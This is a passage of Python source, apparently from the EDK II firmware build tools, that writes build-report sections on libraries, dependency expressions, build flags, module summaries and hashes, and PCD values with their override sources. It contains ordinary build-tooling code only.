LibInfPath = LibraryItem[0] FileWrite(File, LibInfPath) # # Report library class, library constructor and destructor for # EDKII style module. # if self._EdkIIModule: LibClass = LibraryItem[1] EdkIILibInfo = "" LibConstructor = " ".join(LibraryItem[2]) if LibConstructor: EdkIILibInfo += " C = " + LibConstructor LibDestructor = " ".join(LibraryItem[3]) if LibDestructor: EdkIILibInfo += " D = " + LibDestructor LibDepex = " ".join(LibraryItem[4]) if LibDepex: EdkIILibInfo += " Depex = " + LibDepex if LibraryItem[5]: EdkIILibInfo += " Time = " + LibraryItem[5] if EdkIILibInfo: FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo)) else: FileWrite(File, "{%s}" % LibClass) FileWrite(File, gSubSectionEnd) ## # Reports dependency expression information # # This class reports the module dependency expression subsection in the build report file. # class DepexReport(object): ## # Constructor function for class DepexReport # # This constructor function generates DepexReport object for # a module. If the module source contains the DXS file (usually EDK # style module), it uses the dependency in DXS file; otherwise, # it uses the dependency expression from its own INF [Depex] section # and then merges with the ones from its dependent library INF. # # @param self The object pointer # @param M Module context information # def __init__(self, M): self.Depex = "" self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex") ModuleType = M.ModuleType if not ModuleType: ModuleType = gComponentType2ModuleType.get(M.ComponentType, "") if ModuleType in ["SEC", "PEI_CORE", "DXE_CORE", "SMM_CORE", "MM_CORE_STANDALONE", "UEFI_APPLICATION"]: return for Source in M.SourceFileList: if os.path.splitext(Source.Path)[1].lower() == ".dxs": Match = gDxsDependencyPattern.search(open(Source.Path).read()) if Match: self.Depex = Match.group(1).strip() self.Source = "DXS" break else: self.Depex = M.DepexExpressionList.get(M.ModuleType, "") self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType]) if not self.ModuleDepex: self.ModuleDepex = "(None)" LibDepexList = [] for Lib in M.DependentLibraryList: LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip() if LibDepex != "": LibDepexList.append("(" + LibDepex + ")") self.LibraryDepex = " AND ".join(LibDepexList) if not self.LibraryDepex: self.LibraryDepex = "(None)" self.Source = "INF" ## # Generate report for module dependency expression information # # This function generates report for the module dependency expression. # # @param self The object pointer # @param File The file object for report # @param GlobalDepexParser The platform global Dependency expression parser object # def GenerateReport(self, File, GlobalDepexParser): if not self.Depex: return FileWrite(File, gSubSectionStart) if os.path.isfile(self._DepexFileName): try: DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName) FileWrite(File, "Final Dependency Expression (DEPEX) Instructions") for DepexStatement in DepexStatements: FileWrite(File, " %s" % DepexStatement) FileWrite(File, gSubSectionSep) except: EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName) FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source) if self.Source == "INF": FileWrite(File, "%s" % self.Depex, True) FileWrite(File, gSubSectionSep) FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True) FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True) else: FileWrite(File, "%s" % self.Depex) FileWrite(File, gSubSectionEnd) ## # Reports dependency expression information # # This class reports the module build flags subsection in the build report file. # class BuildFlagsReport(object): ## # Constructor function for class BuildFlagsReport # # This constructor function generates BuildFlagsReport object for # a module. It reports the build tool chain tag and all relevant # build flags to build the module. # # @param self The object pointer # @param M Module context information # def __init__(self, M): BuildOptions = {} # # Add build flags according to source file extension so that # irrelevant ones can be filtered out. # for Source in M.SourceFileList: Ext = os.path.splitext(Source.File)[1].lower() if Ext in [".c", ".cc", ".cpp"]: BuildOptions["CC"] = 1 elif Ext in [".s", ".asm"]: BuildOptions["PP"] = 1 BuildOptions["ASM"] = 1 elif Ext in [".vfr"]: BuildOptions["VFRPP"] = 1 BuildOptions["VFR"] = 1 elif Ext in [".dxs"]: BuildOptions["APP"] = 1 BuildOptions["CC"] = 1 elif Ext in [".asl"]: BuildOptions["ASLPP"] = 1 BuildOptions["ASL"] = 1 elif Ext in [".aslc"]: BuildOptions["ASLCC"] = 1 BuildOptions["ASLDLINK"] = 1 BuildOptions["CC"] = 1 elif Ext in [".asm16"]: BuildOptions["ASMLINK"] = 1 BuildOptions["SLINK"] = 1 BuildOptions["DLINK"] = 1 # # Save module build flags. # self.ToolChainTag = M.ToolChain self.BuildFlags = {} for Tool in BuildOptions: self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "") ## # Generate report for module build flags information # # This function generates report for the module build flags expression. # # @param self The object pointer # @param File The file object for report # def GenerateReport(self, File): FileWrite(File, gSubSectionStart) FileWrite(File, "Build Flags") FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag) for Tool in self.BuildFlags: FileWrite(File, gSubSectionSep) FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True) FileWrite(File, gSubSectionEnd) ## # Reports individual module information # # This class reports the module section in the build report file. # It comprises of module summary, module PCD, library, dependency expression, # build flags sections. # class ModuleReport(object): ## # Constructor function for class ModuleReport # # This constructor function generates ModuleReport object for # a separate module in a platform build. # # @param self The object pointer # @param M Module context information # @param ReportType The kind of report items in the final report file # def __init__(self, M, ReportType): self.ModuleName = M.Module.BaseName self.ModuleInfPath = M.MetaFile.File self.FileGuid = M.Guid self.Size = 0 self.BuildTimeStamp = None self.Hash = 0 self.DriverType = "" if not M.IsLibrary: ModuleType = M.ModuleType if not ModuleType: ModuleType = gComponentType2ModuleType.get(M.ComponentType, "") # # If a module complies to PI 1.1, promote Module type to "SMM_DRIVER" # if ModuleType == "DXE_SMM_DRIVER": PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000") if int(PiSpec, 0) >= 0x0001000A: ModuleType = "SMM_DRIVER" self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)") self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "") self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "") self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "") self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "") self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "") self.BuildTime = M.BuildTime self._BuildDir = M.BuildDir self.ModulePcdSet = {} if "PCD" in ReportType: # # Collect all module used PCD set: module INF referenced directly or indirectly. # It also saves module INF default values of them in case they exist. # for Pcd in M.ModulePcdList + M.LibraryPcdList: self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue)) self.LibraryReport = None if "LIBRARY" in ReportType: self.LibraryReport = LibraryReport(M) self.DepexReport = None if "DEPEX" in ReportType: self.DepexReport = DepexReport(M) if "BUILD_FLAGS" in ReportType: self.BuildFlagsReport = BuildFlagsReport(M) ## # Generate report for module information # # This function generates report for separate module expression # in a platform build. # # @param self The object pointer # @param File The file object for report # @param GlobalPcdReport The platform global PCD report object # @param GlobalPredictionReport The platform global Prediction report object # @param GlobalDepexParser The platform global Dependency expression parser object # @param ReportType The kind of report items in the final report file # def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType): FileWrite(File, gSectionStart) FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt") if os.path.isfile(FwReportFileName): try: FileContents = open(FwReportFileName).read() Match = gModuleSizePattern.search(FileContents) if Match: self.Size = int(Match.group(1)) Match = gTimeStampPattern.search(FileContents) if Match: self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1))) except IOError: EdkLogger.warn(None, "Fail to read report file", FwReportFileName) if "HASH" in ReportType: OutputDir = os.path.join(self._BuildDir, "OUTPUT") DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi") if os.path.isfile(DefaultEFIfile): Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp") # rebase the efi image since its base address may not zero cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile] try: PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) except Exception, X: EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0])) EndOfProcedure = threading.Event() EndOfProcedure.clear() if PopenObject.stderr: StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure)) StdErrThread.setName("STDERR-Redirector") StdErrThread.setDaemon(False) StdErrThread.start() # waiting for program exit PopenObject.wait() if PopenObject.stderr: StdErrThread.join() if PopenObject.returncode != 0: EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile)) if os.path.isfile(Tempfile): self.Hash = hashlib.sha1() buf = open(Tempfile, 'rb').read() if self.Hash.update(buf): self.Hash = self.Hash.update(buf) self.Hash = self.Hash.hexdigest() os.remove(Tempfile) FileWrite(File, "Module Summary") FileWrite(File, "Module Name: %s" % self.ModuleName) FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath) FileWrite(File, "File GUID: %s" % self.FileGuid) if self.Size: FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0)) if self.Hash: FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi")) if self.BuildTimeStamp: FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp) if self.BuildTime: FileWrite(File, "Module Build Time: %s" % self.BuildTime) if self.DriverType: FileWrite(File, "Driver Type: %s" % self.DriverType) if self.UefiSpecVersion: FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion) if self.PiSpecVersion: FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion) if self.PciDeviceId: FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId) if self.PciVendorId: FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId) if self.PciClassCode: FileWrite(File, "PCI Class Code: %s" % self.PciClassCode) FileWrite(File, gSectionSep) if "PCD" in ReportType: GlobalPcdReport.GenerateReport(File, self.ModulePcdSet) if "LIBRARY" in ReportType: self.LibraryReport.GenerateReport(File) if "DEPEX" in ReportType: self.DepexReport.GenerateReport(File, GlobalDepexParser) if "BUILD_FLAGS" in ReportType: self.BuildFlagsReport.GenerateReport(File) if "FIXED_ADDRESS" in ReportType and self.FileGuid: GlobalPredictionReport.GenerateReport(File, self.FileGuid) FileWrite(File, gSectionEnd) def ReadMessage(From, To, ExitFlag): while True: # read one line a time Line = From.readline() # empty string means "end" if Line is not None and Line != "": To(Line.rstrip()) else: break if ExitFlag.isSet(): break ## # Reports platform and module PCD information # # This class reports the platform PCD section and module PCD subsection # in the build report file. # class PcdReport(object): ## # Constructor function for class PcdReport # # This constructor function generates PcdReport object a platform build. # It collects the whole PCD database from platform DSC files, platform # flash description file and package DEC files. # # @param self The object pointer # @param Wa Workspace context information # def __init__(self, Wa): self.AllPcds = {} self.UnusedPcds = {} self.ConditionalPcds = {} self.MaxLen = 0 self.Arch = None if Wa.FdfProfile: self.FdfPcdSet = Wa.FdfProfile.PcdDict else: self.FdfPcdSet = {} self.DefaultStoreSingle = True self.SkuSingle = True if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1: self.DefaultStoreSingle = False if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1: self.SkuSingle = False self.ModulePcdOverride = {} for Pa in Wa.AutoGenObjectList: self.Arch = Pa.Arch # # Collect all platform referenced PCDs and grouped them by PCD token space # GUID C Names # for Pcd in Pa.AllPcdList: PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) if len(Pcd.TokenCName) > self.MaxLen: self.MaxLen = len(Pcd.TokenCName) # # Collect the PCD defined in DSC/FDF file, but not used in module # UnusedPcdFullList = [] for item in Pa.Platform.Pcds: Pcd = Pa.Platform.Pcds[item] if not Pcd.Type: # check the Pcd in FDF file, whether it is used in module first for T in ["FixedAtBuild", "PatchableInModule", "FeatureFlag", "Dynamic", "DynamicEx"]: PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, []) if Pcd in PcdList: Pcd.Type = T break if not Pcd.Type: PcdTypeFlag = False for package in Pa.PackageList: for T in ["FixedAtBuild", "PatchableInModule", "FeatureFlag", "Dynamic", "DynamicEx"]: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds: Pcd.Type = T PcdTypeFlag = True if not Pcd.DatumType: Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType break if PcdTypeFlag: break if not Pcd.DatumType: PcdType = Pcd.Type # Try to remove Hii and Vpd suffix if PcdType.startswith("DynamicEx"): PcdType = "DynamicEx" elif PcdType.startswith("Dynamic"): PcdType = "Dynamic" for package in Pa.PackageList: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds: Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType break PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList and Pcd not in UnusedPcdFullList: UnusedPcdFullList.append(Pcd) if len(Pcd.TokenCName) > self.MaxLen: self.MaxLen = len(Pcd.TokenCName) if GlobalData.gConditionalPcds: for PcdItem in GlobalData.gConditionalPcds: if '.' in PcdItem: (TokenSpaceGuidCName, TokenCName) = PcdItem.split('.') if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds.keys(): Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)] PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) UnusedPcdList = [] if UnusedPcdFullList: for Pcd in UnusedPcdFullList: if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds: continue UnusedPcdList.append(Pcd) for Pcd in UnusedPcdList: PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, []) if Pcd not in PcdList: PcdList.append(Pcd) for Module in Pa.Platform.Modules.values(): # # Collect module override PCDs # for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList: TokenCName = ModulePcd.TokenCName TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName ModuleDefault = ModulePcd.DefaultValue ModulePath = os.path.basename(Module.M.MetaFile.File) self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault # # Collect PCD DEC default value. # self.DecPcdDefault = {} self._GuidDict = {} for Pa in Wa.AutoGenObjectList: for Package in Pa.PackageList: Guids = Package.Guids self._GuidDict.update(Guids) for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds: DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue) # # Collect PCDs defined in DSC common section # self.DscPcdDefault = {} for Pa in Wa.AutoGenObjectList: for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds: DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue if DscDefaultValue: self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue def GenerateReport(self, File, ModulePcdSet): if self.ConditionalPcds: self.GenerateReportDetail(File, ModulePcdSet, 1) if self.UnusedPcds: self.GenerateReportDetail(File, ModulePcdSet, 2) self.GenerateReportDetail(File, ModulePcdSet) ## # Generate report for PCD information # # This function generates report for separate module expression # in a platform build. # # @param self The object pointer # @param File The file object for report # @param ModulePcdSet Set of all PCDs referenced by module or None for # platform PCD report # @param ReportySubType 0 means platform/module PCD report, 1 means Conditional # directives section report, 2 means Unused Pcds section report # @param DscOverridePcds Module DSC override PCDs set # def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0): PcdDict = self.AllPcds if ReportSubType == 1: PcdDict = self.ConditionalPcds elif ReportSubType == 2: PcdDict = self.UnusedPcds if ModulePcdSet is None: FileWrite(File, gSectionStart) if ReportSubType == 1: FileWrite(File, "Conditional Directives used by the build system") elif ReportSubType == 2: FileWrite(File, "PCDs not used by modules or in conditional directives") else: FileWrite(File, "Platform Configuration Database Report") FileWrite(File, " *B - PCD override in the build option") FileWrite(File, " *P - Platform scoped PCD override in DSC file") FileWrite(File, " *F - Platform scoped PCD override in FDF file") if not ReportSubType: FileWrite(File, " *M - Module scoped PCD override") FileWrite(File, gSectionSep) else: if not ReportSubType and ModulePcdSet: # # For module PCD sub-section # FileWrite(File, gSubSectionStart) FileWrite(File, TAB_BRG_PCD) FileWrite(File, gSubSectionSep) for Key in PcdDict: # # Group PCD by their token space GUID C Name # First = True for Type in PcdDict[Key]: # # Group PCD by their usage type # TypeName, DecType = gPcdTypeMap.get(Type, ("", Type)) for Pcd in PcdDict[Key][Type]: PcdTokenCName = Pcd.TokenCName MixedPcdFlag = False if GlobalData.MixedPcd: for PcdKey in GlobalData.MixedPcd: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.MixedPcd[PcdKey]: PcdTokenCName = PcdKey[0] MixedPcdFlag = True if MixedPcdFlag and not ModulePcdSet: continue # # Get PCD default value and their override relationship # DecDefaultValue = self.DecPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, DecType)) DscDefaultValue = self.DscPcdDefault.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName)) DscDefaultValBak = DscDefaultValue DscDefaultValue = self.FdfPcdSet.get((Pcd.TokenCName, Key), DscDefaultValue) if DscDefaultValue != DscDefaultValBak: try: DscDefaultValue = ValueExpressionEx(DscDefaultValue, Pcd.DatumType, self._GuidDict)(True) except BadExpression, DscDefaultValue: EdkLogger.error('BuildReport', FORMAT_INVALID, "PCD Value: %s, Type: %s" %(DscDefaultValue, Pcd.DatumType)) InfDefaultValue = None PcdValue = DecDefaultValue if DscDefaultValue: PcdValue = DscDefaultValue if ModulePcdSet is not None: if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type) not in ModulePcdSet: continue InfDefault, PcdValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type] if InfDefault == "": InfDefault = None BuildOptionMatch = False if GlobalData.BuildOptionPcd: for pcd in GlobalData.BuildOptionPcd: if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (pcd[0], pcd[1]): if pcd[2]: continue PcdValue = pcd[3] Pcd.DefaultValue = PcdValue BuildOptionMatch = True break if First: if ModulePcdSet is None: FileWrite(File, "") FileWrite(File, Key) First = False if Pcd.DatumType in ('UINT8', 'UINT16', 'UINT32', 'UINT64'): PcdValueNumber = int(PcdValue.strip(), 0) if DecDefaultValue is None: DecMatch = True else: DecDefaultValueNumber = int(DecDefaultValue.strip(), 0) DecMatch = (DecDefaultValueNumber == PcdValueNumber) if InfDefaultValue is None: InfMatch = True else: InfDefaultValueNumber = int(InfDefaultValue.strip(), 0) InfMatch = (InfDefaultValueNumber == PcdValueNumber) if DscDefaultValue is None: DscMatch = True else: DscDefaultValueNumber = int(DscDefaultValue.strip(), 0) DscMatch = (DscDefaultValueNumber == PcdValueNumber) else: if DecDefaultValue is None: DecMatch = True else: DecMatch = (DecDefaultValue.strip() == PcdValue.strip()) if InfDefaultValue is None: InfMatch = True else: InfMatch = (InfDefaultValue.strip() == PcdValue.strip()) if DscDefaultValue is None: DscMatch = True else: DscMatch = (DscDefaultValue.strip() == PcdValue.strip()) IsStructure = False if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd.keys()) and ((Pcd.TokenCName, Pcd.TokenSpaceGuidCName) in GlobalData.gStructurePcd[self.Arch]): IsStructure = True if TypeName in ('DYNVPD', 'DEXVPD'): SkuInfoList = Pcd.SkuInfoList Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)] Pcd.DatumType = Pcd.StructName if TypeName in ('DYNVPD', 'DEXVPD'): Pcd.SkuInfoList = SkuInfoList if Pcd.PcdFieldValueFromComm: BuildOptionMatch = True DecMatch = False elif Pcd.SkuOverrideValues: DscOverride = False if not Pcd.SkuInfoList: OverrideValues = Pcd.SkuOverrideValues if OverrideValues: Keys = OverrideValues.keys() Data = OverrideValues[Keys[0]] Struct = Data.values()[0] DscOverride = self.ParseStruct(Struct) else: SkuList = sorted(Pcd.SkuInfoList.keys()) for Sku in SkuList: SkuInfo = Pcd.SkuInfoList[Sku] if TypeName in ('DYNHII', 'DEXHII'): if SkuInfo.DefaultStoreDict: DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys()) for DefaultStore in DefaultStoreList: OverrideValues = Pcd.SkuOverrideValues[Sku] DscOverride = self.ParseStruct(OverrideValues[DefaultStore]) if DscOverride: break else: OverrideValues = Pcd.SkuOverrideValues[Sku] if OverrideValues: Keys = OverrideValues.keys() OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]]) DscOverride = self.ParseStruct(OverrideFieldStruct) if DscOverride: break if DscOverride: DscMatch = True DecMatch = False # # Report PCD item according to their override relationship # if DecMatch and InfMatch: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ') elif BuildOptionMatch: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B') else: if DscMatch: if (Pcd.TokenCName, Key) in self.FdfPcdSet: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F') else: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P') else: self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M') if ModulePcdSet is None: if IsStructure: continue if not TypeName in ('PATCH', 'FLAG', 'FIXED'): continue if not BuildOptionMatch: ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {}) for ModulePath in ModuleOverride: ModuleDefault = ModuleOverride[ModulePath] if Pcd.DatumType in ('UINT8', 'UINT16', 'UINT32', 'UINT64'): ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0) Match = (ModulePcdDefaultValueNumber == PcdValueNumber) else: Match = (ModuleDefault.strip() == PcdValue.strip()) if Match: continue IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip()) if IsByteArray: FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 19, ModulePath, '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 19, ModulePath, ModuleDefault.strip())) if ModulePcdSet is None: FileWrite(File, gSectionEnd) else: if not ReportSubType and ModulePcdSet: FileWrite(File, gSubSectionEnd) def ParseStruct(self, struct): HasDscOverride = False if struct: for _, Values in struct.items(): if Values[1] and Values[1].endswith('.dsc'): HasDscOverride = True break return HasDscOverride def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue): if not DscMatch and DscDefaultValue is not None: Value = DscDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value)) if not InfMatch and InfDefaultValue is not None: Value = InfDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value)) if not DecMatch and DecDefaultValue is not None: Value = DecDefaultValue.strip() IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{")) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value)) if IsStructure: self.PrintStructureInfo(File, Pcd.DefaultValues) if DecMatch and IsStructure: self.PrintStructureInfo(File, Pcd.DefaultValues) def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '): if not Pcd.SkuInfoList: Value = Pcd.DefaultValue IsByteArray, ArrayList = ByteArrayForamt(Value) if IsByteArray: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) if IsStructure: OverrideValues = Pcd.SkuOverrideValues if OverrideValues: Keys = OverrideValues.keys() Data = OverrideValues[Keys[0]] Struct = Data.values()[0] OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct) self.PrintStructureInfo(File, OverrideFieldStruct) self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue) else: FirstPrint = True SkuList = sorted(Pcd.SkuInfoList.keys()) for Sku in SkuList: SkuInfo = Pcd.SkuInfoList[Sku] SkuIdName = SkuInfo.SkuIdName if TypeName in ('DYNHII', 'DEXHII'): if SkuInfo.DefaultStoreDict: DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys()) for DefaultStore in DefaultStoreList: Value = SkuInfo.DefaultStoreDict[DefaultStore] IsByteArray, ArrayList = ByteArrayForamt(Value) if FirstPrint: FirstPrint = False if IsByteArray: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{')) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{')) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{')) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value)) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value)) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value)) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value)) else: if IsByteArray: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{')) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{')) elif not self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{')) else: FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{')) for Array in ArrayList: FileWrite(File, '%s' % (Array)) else: if self.DefaultStoreSingle and self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value)) elif self.DefaultStoreSingle and not self.SkuSingle: FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + 